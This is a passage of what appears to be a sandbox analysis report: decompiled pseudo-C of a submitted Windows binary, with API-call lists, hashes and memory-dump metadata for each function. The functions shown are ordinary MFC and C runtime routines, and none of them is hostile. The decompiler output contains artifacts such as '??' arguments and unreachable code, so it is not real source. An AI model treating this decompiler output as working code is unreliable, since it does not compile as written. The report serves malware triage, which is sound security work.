                  								E004010B0( *((intOrPtr*)(_t152 - 0x14)) + 0xfffffff0, _t148);
                  							}
                  							 *(_t152 - 4) =  *(_t152 - 4) & 0x00000000;
                  							__eflags =  *(_t152 - 0x10) & 0x00000001;
                  							if(( *(_t152 - 0x10) & 0x00000001) != 0) {
                  								__eflags =  *((intOrPtr*)(_t152 - 0x18)) + 0xfffffff0;
                  								E004010B0( *((intOrPtr*)(_t152 - 0x18)) + 0xfffffff0, _t148);
                  							}
                  							__eflags =  *((char*)(_t152 + 0xb));
                  							if( *((char*)(_t152 + 0xb)) == 0) {
                  								_t103 =  *( *((intOrPtr*)(_t152 - 0x64)) + 8);
                  								__eflags = _t103;
                  								if(_t103 != 0) {
                  									E0041FD19(_t103);
                  								}
                  								_t105 =  *( *((intOrPtr*)(_t152 - 0x64)) + 0xc);
                  								__eflags =  *( *((intOrPtr*)(_t152 - 0x64)) + 0xc);
                  								if(__eflags != 0) {
                  									E0041FD19(_t105);
                  								}
                  							} else {
                  								_t108 =  *(_t130 + 0x70);
                  								__eflags = _t108;
                  								if(_t108 != 0) {
                  									E0041FD19(_t108);
                  								}
                  								E0041FD19( *(_t130 + 0x74));
                  								_t110 =  *((intOrPtr*)(_t152 - 0x64));
                  								 *(_t130 + 0x70) =  *(_t110 + 8);
                  								 *(_t130 + 0x74) =  *(_t110 + 0xc);
                  							}
                  							goto L6;
                  						}
                  						_t117 = E0042A4CF(_t152 - 0xd8, _t152 - 0x14);
                  						 *(_t152 - 4) = 2;
                  						 *(_t152 - 0x10) = 3;
                  						_t120 = lstrcmpA(_t151 + (_t151[1] & 0x0000ffff),  *_t117);
                  						__eflags = _t120;
                  						if(_t120 != 0) {
                  							goto L14;
                  						}
                  						_t122 = E0042A503(_t152 - 0xd8, _t152 - 0x1c);
                  						 *(_t152 - 0x10) = 7;
                  						_t125 = lstrcmpA(_t151 + (_t151[2] & 0x0000ffff),  *_t122);
                  						 *((char*)(_t152 + 0xb)) = 0;
                  						__eflags = _t125;
                  						if(_t125 == 0) {
                  							goto L15;
                  						}
                  						goto L14;
                  					}
                  					_t126 =  *(_t130 + 0x70);
                  					__eflags = _t126 - _t150;
                  					if(_t126 != _t150) {
                  						E0041FD19(_t126);
                  					}
                  					E0041FD19( *(_t130 + 0x74));
                  					 *(_t130 + 0x70) = _t150;
                  					 *(_t130 + 0x74) = _t150;
                  				}
                  				L6:
                  				 *((intOrPtr*)(_t152 - 0xd8)) = 0x452264;
                  				_t13 = _t152 - 0xd8; // 0x452264
                  				_t135 = _t13;
                  				goto L34;
                  			}
























                  APIs
                  • __EH_prolog3.LIBCMT ref: 00418056
                  • GlobalLock.KERNEL32 ref: 00418077
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 00418120
                  • lstrcmpA.KERNEL32(?,00000000,?), ref: 0041814C
                  • lstrcmpA.KERNEL32(?,00000000,?), ref: 00418171
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: lstrcmp$H_prolog3$Exception@8GlobalLockThrow
                  • String ID: d"E$d"E
                  • API String ID: 569107404-4184370214
                  • Opcode ID: f22b6adbf6a52a6464731256e8cc4a1d6826a5d007fc807aca6f42d55c9a3b2b
                  • Instruction ID: 524c0d43197d56bd0e71cd9908d075d591d8cf06ddb31c5e0e4a1a423c794921
                  • Opcode Fuzzy Hash: f22b6adbf6a52a6464731256e8cc4a1d6826a5d007fc807aca6f42d55c9a3b2b
                  • Instruction Fuzzy Hash: AC61A4309002199BDB11EFA5CC45BEEBBF4AF04314F14429FE815A72A2DB78DAC5CB19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 81%
                  			E00416F97(void* __ecx, void* __edx, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
                  				signed int _v8;
                  				char _v9;
                  				char _v268;
                  				struct HWND__* _v272;
                  				signed int _v276;
                  				long _v280;
                  				struct HWND__* _v284;
                  				intOrPtr _v288;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t36;
                  				signed int _t53;
                  				intOrPtr _t56;
                  				long _t59;
                  				struct HWND__* _t62;
                  				CHAR* _t63;
                  				void* _t64;
                  				void* _t66;
                  				void* _t70;
                  				void* _t71;
                  				long _t72;
                  				void* _t73;
                  				void* _t74;
                  				signed int _t76;
                  				void* _t77;
                  				signed int _t81;
                  
                  				_t70 = __edx;
                  				_t79 = _t81;
                  				_t36 =  *0x463404; // 0x38a11573
                  				_v8 = _t36 ^ _t81;
                  				_t72 = _a4;
                  				_t76 = 0;
                  				_v288 = _a8;
                  				E00416EAC(0);
                  				_t66 = _t71;
                  				_t62 = E00416EE5(0,  &_v272);
                  				_v284 = _t62;
                  				if(_t62 != _v272) {
                  					EnableWindow(_t62, 1);
                  				}
                  				_v280 = _v280 & _t76;
                  				GetWindowThreadProcessId(_t62,  &_v280);
                  				if(_t62 == 0 || _v280 != GetCurrentProcessId()) {
                  					L7:
                  					__eflags = _t72;
                  					if(__eflags != 0) {
                  						_t76 = _t72 + 0x78;
                  					}
                  					goto L9;
                  				} else {
                  					_t59 = SendMessageA(_t62, 0x376, 0, 0);
                  					if(_t59 == 0) {
                  						goto L7;
                  					} else {
                  						_t76 = _t59;
                  						L9:
                  						_v276 = _v276 & 0x00000000;
                  						if(_t76 != 0) {
                  							_v276 =  *_t76;
                  							_t56 = _a16;
                  							if(_t56 != 0) {
                  								 *_t76 = _t56 + 0x30000;
                  							}
                  						}
                  						if((_a12 & 0x000000f0) == 0) {
                  							_t53 = _a12 & 0x0000000f;
                  							if(_t53 <= 1) {
                  								_t23 =  &_a12;
                  								 *_t23 = _a12 | 0x00000030;
                  								__eflags =  *_t23;
                  							} else {
                  								if(_t53 + 0xfffffffd <= 1) {
                  									_a12 = _a12 | 0x00000020;
                  								}
                  							}
                  						}
                  						_v268 = 0;
                  						_t96 = _t72;
                  						if(_t72 == 0) {
                  							_t63 =  &_v268;
                  							_t72 = 0x104;
                  							__eflags = GetModuleFileNameA(0, _t63, 0x104) - 0x104;
                  							if(__eflags == 0) {
                  								_v9 = 0;
                  							}
                  						} else {
                  							_t63 =  *(_t72 + 0x50);
                  						}
                  						_push(_a12);
                  						_push(_t63);
                  						_push(_v288);
                  						_push(_v284);
                  						_t73 = E0040D53F(_t63, _t66, _t72, _t76, _t96);
                  						if(_t76 != 0) {
                  							 *_t76 = _v276;
                  						}
                  						if(_v272 != 0) {
                  							EnableWindow(_v272, 1);
                  						}
                  						E00416EAC(1);
                  						_pop(_t74);
                  						_pop(_t77);
                  						_pop(_t64);
                  						return E00430650(_t73, _t64, _v8 ^ _t79, _t70, _t74, _t77);
                  					}
                  				}
                  			}

                  APIs
                    • Part of subcall function 00416EE5: GetParent.USER32(?), ref: 00416F39
                    • Part of subcall function 00416EE5: GetLastActivePopup.USER32(?), ref: 00416F4A
                    • Part of subcall function 00416EE5: IsWindowEnabled.USER32(?), ref: 00416F5E
                    • Part of subcall function 00416EE5: EnableWindow.USER32(?,00000000), ref: 00416F71
                  • EnableWindow.USER32(?,00000001), ref: 00416FE4
                  • GetWindowThreadProcessId.USER32(?,?), ref: 00416FF8
                  • GetCurrentProcessId.KERNEL32(?,?), ref: 00417002
                  • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0041701A
                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?), ref: 00417094
                  • EnableWindow.USER32(00000000,00000001), ref: 004170D9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                  • String ID: 0
                  • API String ID: 1877664794-4108050209
                  • Opcode ID: ce558fa7acdf3303bd566467654de892301f9c66d5748dfdb9f4510779595b67
                  • Instruction ID: b4bc687f8c3733e7692b145a2cdb5596cc84dfbc90c2c000e693f98fe407a247
                  • Opcode Fuzzy Hash: ce558fa7acdf3303bd566467654de892301f9c66d5748dfdb9f4510779595b67
                  • Instruction Fuzzy Hash: 9C41D432A043189BDB218F25CC42BDABBB4FB59710F1405AAF555A7280D7B5DEC08F98
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 74%
                  			E00433E25(void* __edx, void* __esi, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
                  				DWORD* _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __ebp;
                  				void* _t20;
                  				DWORD* _t25;
                  				intOrPtr* _t27;
                  				intOrPtr _t41;
                  				void* _t44;
                  
                  				_t1 =  &_a12; // 0x416327
                  				_t41 =  *_t1;
                  				_v8 = 0;
                  				_t48 = _t41;
                  				if(_t41 != 0) {
                  					_push(__esi);
                  					E00435F8A();
                  					_t44 = E004381D6(1, 0x214);
                  					__eflags = _t44;
                  					if(__eflags == 0) {
                  						L7:
                  						_push(_t44);
                  						E004316F6(0, _t41, _t44, __eflags);
                  						__eflags = _v8;
                  						if(_v8 != 0) {
                  							E00431D64(_v8);
                  						}
                  						_t20 = 0;
                  						__eflags = 0;
                  					} else {
                  						_push( *((intOrPtr*)(E00436178(0, __edx, _t41, __eflags) + 0x6c)));
                  						_push(_t44);
                  						E00436018(0, _t41, _t44, __eflags);
                  						 *(_t44 + 4) =  *(_t44 + 4) | 0xffffffff;
                  						 *((intOrPtr*)(_t44 + 0x58)) = _a16;
                  						_t25 = _a24;
                  						 *((intOrPtr*)(_t44 + 0x54)) = _t41;
                  						__eflags = _t25;
                  						if(_t25 == 0) {
                  							_t10 =  &_a12; // 0x416327
                  							_t25 = _t10;
                  						}
                  						_t20 = CreateThread(_a4, _a8, E00433DA2, _t44, _a20, _t25);
                  						__eflags = _t20;
                  						if(__eflags == 0) {
                  							_v8 = GetLastError();
                  							goto L7;
                  						}
                  					}
                  				} else {
                  					_t27 = E00431D3E(_t48);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					_push(0);
                  					 *_t27 = 0x16;
                  					E004367E9(__edx, _t41, __esi);
                  					_t20 = 0;
                  				}
                  				return _t20;
                  			}

                  APIs
                  • ___set_flsgetvalue.LIBCMT ref: 00433E56
                  • __calloc_crt.LIBCMT ref: 00433E62
                  • __getptd.LIBCMT ref: 00433E6F
                  • CreateThread.KERNEL32(?,?,00433DA2,00000000,?,004164CA), ref: 00433EA6
                  • GetLastError.KERNEL32(?,73BCF560,00000000,?,?,004164CA,?,?,00416327,?,?,?), ref: 00433EB0
                  • __dosmaperr.LIBCMT ref: 00433EC8
                    • Part of subcall function 00431D3E: __getptd_noexit.LIBCMT ref: 00431D3E
                    • Part of subcall function 004367E9: __decode_pointer.LIBCMT ref: 004367F4
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                  • String ID: 'cA
                  • API String ID: 1803633139-2370355221
                  • Opcode ID: 97ae358cae2b5e0f0641d5fcdea82227c1b56a12331c9cfd899aa4e2063e2b34
                  • Instruction ID: b1eb4aeef8b7e0ec2ddc809c9a465840061659f621b381ffd8a73e26934c2983
                  • Opcode Fuzzy Hash: 97ae358cae2b5e0f0641d5fcdea82227c1b56a12331c9cfd899aa4e2063e2b34
                  • Instruction Fuzzy Hash: 6811C172500209AFDB11BFA6DC8289F77A5EF08329F10543FF511921A1DB799A019BA8
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 85%
                  			E00402D20(void* __ecx, signed int _a4, char _a8) {
                  				intOrPtr _v8;
                  				char _v12;
                  				char _v40;
                  				char _v44;
                  				void* _v84;
                  				char _v88;
                  				char _v108;
                  				char _v112;
                  				void* _v152;
                  				char _v156;
                  				signed int _t30;
                  				signed int _t34;
                  				signed char _t48;
                  				void* _t60;
                  
                  				_push(0xffffffff);
                  				_push(E0044A998);
                  				_push( *[fs:0x0]);
                  				_t30 =  *0x463404; // 0x38a11573
                  				_push(_t30 ^ _t60 - 0x00000088);
                  				 *[fs:0x0] =  &_v12;
                  				_t34 = _a4 & 0x00000017;
                  				 *(__ecx + 8) = _t34;
                  				_t48 =  *(__ecx + 0xc) & _t34;
                  				if(_t48 != 0) {
                  					if(_a8 != 0) {
                  						E00430CF4(0, 0);
                  					}
                  					_t65 = _t48 & 0x00000004;
                  					if((_t48 & 0x00000004) != 0) {
                  						E00402CE0( &_v108, "ios_base::badbit set");
                  						_v8 = 0;
                  						E00402BA0(_t65,  &_v112);
                  						_t48 =  &_v156;
                  						_v156 = 0x44f0a8;
                  						E00430CF4(_t48, 0x45ad90);
                  					}
                  					_t66 = _t48 & 0x00000002;
                  					if((_t48 & 0x00000002) != 0) {
                  						E00402CE0( &_v108, "ios_base::failbit set");
                  						_v8 = 1;
                  						E00402BA0(_t66,  &_v112);
                  						_v156 = 0x44f0a8;
                  						E00430CF4( &_v156, 0x45ad90);
                  					}
                  					E00402CE0( &_v40, "ios_base::eofbit set");
                  					_v8 = 2;
                  					E00402BA0(_t66,  &_v44);
                  					_v88 = 0x44f0a8;
                  					_t34 = E00430CF4( &_v88, 0x45ad90);
                  				}
                  				 *[fs:0x0] = _v12;
                  				return _t34;
                  			}

                  APIs
                  • __CxxThrowException@8.LIBCMT ref: 00402D6F
                    • Part of subcall function 00430CF4: RaiseException.KERNEL32(?,?,?,?), ref: 00430D36
                  • __CxxThrowException@8.LIBCMT ref: 00402DB2
                  • __CxxThrowException@8.LIBCMT ref: 00402DF5
                  • __CxxThrowException@8.LIBCMT ref: 00402E33
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8Throw$ExceptionRaise
                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                  • API String ID: 3476068407-1866435925
                  • Opcode ID: 8f95e4d1e37a7c6acf28a081d9fc95e877f857d108d1fadd9b6df138fa67fc84
                  • Instruction ID: 6733c9bcb70d95c348e19533369f8285caa6829711c6102e50207661ceb21adc
                  • Opcode Fuzzy Hash: 8f95e4d1e37a7c6acf28a081d9fc95e877f857d108d1fadd9b6df138fa67fc84
                  • Instruction Fuzzy Hash: 20219371058340AED365DB14C956F9EB7E4BF84704F508A2EF489522C2DBBC940CCB2B
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 91%
                  			E0042B903(intOrPtr __ecx, void* __eflags) {
                  				int _v8;
                  				struct HWND__* _v12;
                  				intOrPtr _v16;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HWND__* _t44;
                  				intOrPtr _t47;
                  				intOrPtr _t48;
                  				void* _t50;
                  				int _t52;
                  				void* _t54;
                  				intOrPtr* _t60;
                  				int _t62;
                  				void* _t66;
                  				void* _t81;
                  				void* _t83;
                  				intOrPtr _t84;
                  				void* _t87;
                  
                  				_t87 = __eflags;
                  				_t84 = __ecx;
                  				_t79 =  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x74)) + 0x20)) - lstrlenA( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1;
                  				E00431160(_t81,  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x74)) + 0x1c)) + lstrlenA( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1, 0,  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x74)) + 0x20)) - lstrlenA( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1);
                  				_t44 = GetFocus();
                  				_t82 =  *((intOrPtr*)(_t84 + 0x74));
                  				_t71 = _t84;
                  				_v12 = _t44;
                  				_v8 = 0;
                  				 *( *((intOrPtr*)(_t84 + 0x74)) + 4) = E004177A7(0, _t84, _t87);
                  				E0040EEF5(_t87);
                  				_t47 =  *((intOrPtr*)(_t84 + 0x74));
                  				_t66 = EnableWindow;
                  				if( *(_t47 + 4) != 0) {
                  					_t62 = IsWindowEnabled( *(_t47 + 4));
                  					_t89 = _t62;
                  					if(_t62 != 0) {
                  						_v8 = 1;
                  						EnableWindow( *( *((intOrPtr*)(_t84 + 0x74)) + 4), 0);
                  					}
                  				}
                  				_t48 = E0041EDAB(_t66, _t82, _t84, _t89);
                  				_v16 = _t48;
                  				if( *((intOrPtr*)(_t84 + 0x78)) == 1) {
                  					L6:
                  					E00410F0D(__eflags, _t84);
                  					goto L7;
                  				} else {
                  					_t71 =  *((intOrPtr*)(_t84 + 0x74));
                  					if(( *( *((intOrPtr*)(_t84 + 0x74)) + 0x34) & 0x00080000) == 0) {
                  						goto L6;
                  					}
                  					 *((intOrPtr*)(_t48 + 0x18)) = _t84;
                  					L7:
                  					_t92 =  *((intOrPtr*)(_t84 + 0x78)) - 1;
                  					if( *((intOrPtr*)(_t84 + 0x78)) != 1) {
                  						__eflags =  *((intOrPtr*)(_t84 + 0x88));
                  						_push( *((intOrPtr*)(_t84 + 0x74)));
                  						if(__eflags == 0) {
                  							_t50 = E0042AF21(_t71);
                  						} else {
                  							_t50 = E0042AF05(_t71);
                  						}
                  						_t83 = _t50;
                  					} else {
                  						E0042B39D(_t66, _t84, _t79, _t82, _t84, _t92);
                  						_t60 =  *((intOrPtr*)(_t84 + 0x80));
                  						_t83 = (0 |  *((intOrPtr*)( *_t60 + 0xc))(_t60,  *( *((intOrPtr*)(_t84 + 0x74)) + 4)) != 0x00000000) + 1;
                  					}
                  					 *(_v16 + 0x18) =  *(_v16 + 0x18) & 0x00000000;
                  					if(_v8 != 0) {
                  						EnableWindow( *( *((intOrPtr*)(_t84 + 0x74)) + 4), 1);
                  					}
                  					_t52 = IsWindow(_v12);
                  					_t95 = _t52;
                  					if(_t52 != 0) {
                  						SetFocus(_v12);
                  					}
                  					E004177E3(_t66, _t84, _t83, _t84, _t95);
                  					if(_t83 == 0) {
                  						_t54 = 2;
                  						return _t54;
                  					} else {
                  						return _t83;
                  					}
                  				}
                  			}

                  APIs
                  • lstrlenA.KERNEL32(?), ref: 0042B916
                  • _memset.LIBCMT ref: 0042B92F
                  • GetFocus.USER32 ref: 0042B937
                    • Part of subcall function 0040EEF5: UnhookWindowsHookEx.USER32(?), ref: 0040EF25
                  • IsWindowEnabled.USER32(?), ref: 0042B966
                  • EnableWindow.USER32(?,00000000), ref: 0042B97F
                  • EnableWindow.USER32(00000000,00000001), ref: 0042BA00
                  • IsWindow.USER32(?), ref: 0042BA05
                  • SetFocus.USER32(?), ref: 0042BA12
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$EnableFocus$EnabledHookUnhookWindows_memsetlstrlen
                  • String ID:
                  • API String ID: 3424750955-0
                  • Opcode ID: 396e8230032d167e0f749f7c4e66d527f1a44f3aef8f9213c19133dde9002ae0
                  • Instruction ID: 5ffdb8c87b23e72ae1c3345b555018d1f88239f1c59b945354e68bb63e707acc
                  • Opcode Fuzzy Hash: 396e8230032d167e0f749f7c4e66d527f1a44f3aef8f9213c19133dde9002ae0
                  • Instruction Fuzzy Hash: 2C31D170700A10EFDB219F65E989B5ABBF1FF44704F54442EEA4687261CB39EC81CB88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 28%
                  			E004042A0(void* __ecx) {
                  				void* __ebx;
                  				void* _t23;
                  				void* _t37;
                  				void* _t38;
                  				intOrPtr* _t51;
                  				void* _t52;
                  				void* _t53;
                  				void* _t54;
                  
                  				_t23 = E0040EE3C(_t37, __ecx,  *((intOrPtr*)(_t54 + 0x18)));
                  				_t51 =  *((intOrPtr*)(_t54 + 0x20));
                  				_t38 = _t23;
                  				do {
                  					_t53 = 0;
                  					_t3 = _t53 + 5; // 0x5
                  					_t52 = _t3;
                  					do {
                  						if(_t51 == 0) {
                  							L6:
                  							if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
                  								_push(0);
                  								_push(_t52);
                  								_push(0x401);
                  								if(_t51 != 0) {
                  									PostMessageA( *(_t38 + 0x20), ??, ??, ??);
                  								} else {
                  									SendMessageA( *(_t38 + 0x20), ??, ??, ??);
                  								}
                  							}
                  							Sleep( *(_t54 + 0x24) * 0x32);
                  							goto L11;
                  						} else {
                  							if(WaitForSingleObject( *(_t51 + 0x18), 0) == 0) {
                  								if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
                  									PostMessageA( *(_t38 + 0x20), 0x401, 0, 0);
                  								}
                  								return 0;
                  							} else {
                  								if(WaitForSingleObject( *(_t51 + 0x10), 0) != 0) {
                  									goto L6;
                  								} else {
                  									 *((intOrPtr*)(_t54 + 0x14)) =  *_t51;
                  									 *((intOrPtr*)(_t54 + 0x18)) =  *((intOrPtr*)(_t51 + 4));
                  									_t53 = 1;
                  								}
                  								goto L11;
                  							}
                  						}
                  						L21:
                  						L11:
                  						_t52 = _t52 + 5;
                  					} while (_t52 < 0x64);
                  					if( *((intOrPtr*)(_t54 + 0x28)) != 0) {
                  						_push(0);
                  						_push(0x64);
                  						_push(0x401);
                  						if(_t51 != 0) {
                  							PostMessageA( *(_t38 + 0x20), ??, ??, ??);
                  						} else {
                  							SendMessageA( *(_t38 + 0x20), ??, ??, ??);
                  						}
                  					}
                  				} while (_t53 != 0);
                  				_t19 = _t53 + 1; // 0x1
                  				 *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x1c)))) =  *((intOrPtr*)(_t54 + 0x14)) +  *((intOrPtr*)(_t54 + 0x18));
                  				return _t19;
                  				goto L21;
                  			}

                  APIs
                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042CA
                  • WaitForSingleObject.KERNEL32(?,00000000,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 004042DE
                  • SendMessageA.USER32(?,00000401,00000005,00000000), ref: 00404313
                  • PostMessageA.USER32 ref: 0040431F
                  • Sleep.KERNEL32(?,?,?,?,745E8A10,73BCF750,0040104F,?,?,?,?,?,?), ref: 0040432D
                  • SendMessageA.USER32(?,00000401,00000064,00000000), ref: 00404353
                  • PostMessageA.USER32 ref: 0040435F
                  • PostMessageA.USER32 ref: 00404399
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Post$ObjectSendSingleWait$Sleep
                  • String ID:
                  • API String ID: 2464283338-0
                  • Opcode ID: e139fae51d1acb6b981efbecc83b4810472bbac4ed5e08c3c844cb455426c526
                  • Instruction ID: e8d374fd60e575347347b4847cbe04a4b6a9ea2e9a853ff6579190935c6ace5b
                  • Opcode Fuzzy Hash: e139fae51d1acb6b981efbecc83b4810472bbac4ed5e08c3c844cb455426c526
                  • Instruction Fuzzy Hash: 8B31AAB5304300ABD720CF61D888B6B77A4FBC8740F21492EFA45AB2D0C774E801CB59
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E004058EB(struct HMENU__* _a4, struct HMENU__* _a8, signed int _a12) {
                  				signed int _v8;
                  				int _v12;
                  				int _v16;
                  				signed int _v20;
                  				int _t34;
                  				int _t36;
                  				struct HMENU__* _t40;
                  
                  				_v16 = GetMenuItemCount(_a8);
                  				_t34 = GetMenuItemCount(_a4) - 1;
                  				_v12 = _t34;
                  				if(_t34 >= 0) {
                  					while(1) {
                  						_t40 = GetSubMenu(_a4, _t34);
                  						_t36 = 0;
                  						if(_t40 == 0) {
                  							goto L15;
                  						}
                  						if(_a12 == 0) {
                  							_v8 = 0;
                  							if(_v16 <= 0) {
                  								goto L15;
                  							}
                  							while(GetSubMenu(_a8, _v8) != _t40) {
                  								_v8 = _v8 + 1;
                  								_t36 = _v8;
                  								if(_t36 < _v16) {
                  									continue;
                  								}
                  								goto L15;
                  							}
                  							_t36 = RemoveMenu(_a4, _v12, 0x400);
                  							goto L15;
                  						}
                  						_t36 = GetMenuItemCount(_t40);
                  						_v8 = _v8 & 0x00000000;
                  						_v20 = 0;
                  						if(0 <= 0) {
                  							goto L15;
                  						}
                  						while(GetSubMenu(_t40, _v8) != _a12) {
                  							_v8 = _v8 + 1;
                  							_t36 = _v8;
                  							if(_t36 < _v20) {
                  								continue;
                  							}
                  							goto L15;
                  						}
                  						_t36 = RemoveMenu(_t40, _v8, 0x400);
                  						_a12 = _a12 & 0x00000000;
                  						L15:
                  						_t30 =  &_v12;
                  						 *_t30 = _v12 - 1;
                  						if( *_t30 >= 0) {
                  							_t34 = _v12;
                  							continue;
                  						}
                  						return _t36;
                  					}
                  				}
                  				return _t34;
                  			}











                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Menu$CountItem$Remove
                  • String ID:
                  • API String ID: 3494307843-0
                  • Opcode ID: 355b6eac9d52a1f3d8502844bc001d4e6e353e26e1e23ac2360e34f5f54add6f
                  • Instruction ID: 49eee78c3151055738ae538050c0b4c0c1aa464ef4351a21364b38b03e5811b7
                  • Opcode Fuzzy Hash: 355b6eac9d52a1f3d8502844bc001d4e6e353e26e1e23ac2360e34f5f54add6f
                  • Instruction Fuzzy Hash: E121F8B5900609FBCF11DFA5CD409AFBBBAFB44320F2045A2E905B2291D7399A51DF58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00414F48(void* __ecx, char* _a4) {
                  				void* _v8;
                  				void* _t15;
                  				void* _t20;
                  				void* _t35;
                  
                  				_push(__ecx);
                  				_t35 = __ecx;
                  				_t15 =  *(__ecx + 0x74);
                  				if(_t15 != 0) {
                  					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                  					if(_t15 == 0) {
                  						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                  						if(_t15 != 0) {
                  							_t18 =  *(_t35 + 0x70);
                  							if( *(_t35 + 0x70) != 0) {
                  								E0041FD19(_t18);
                  							}
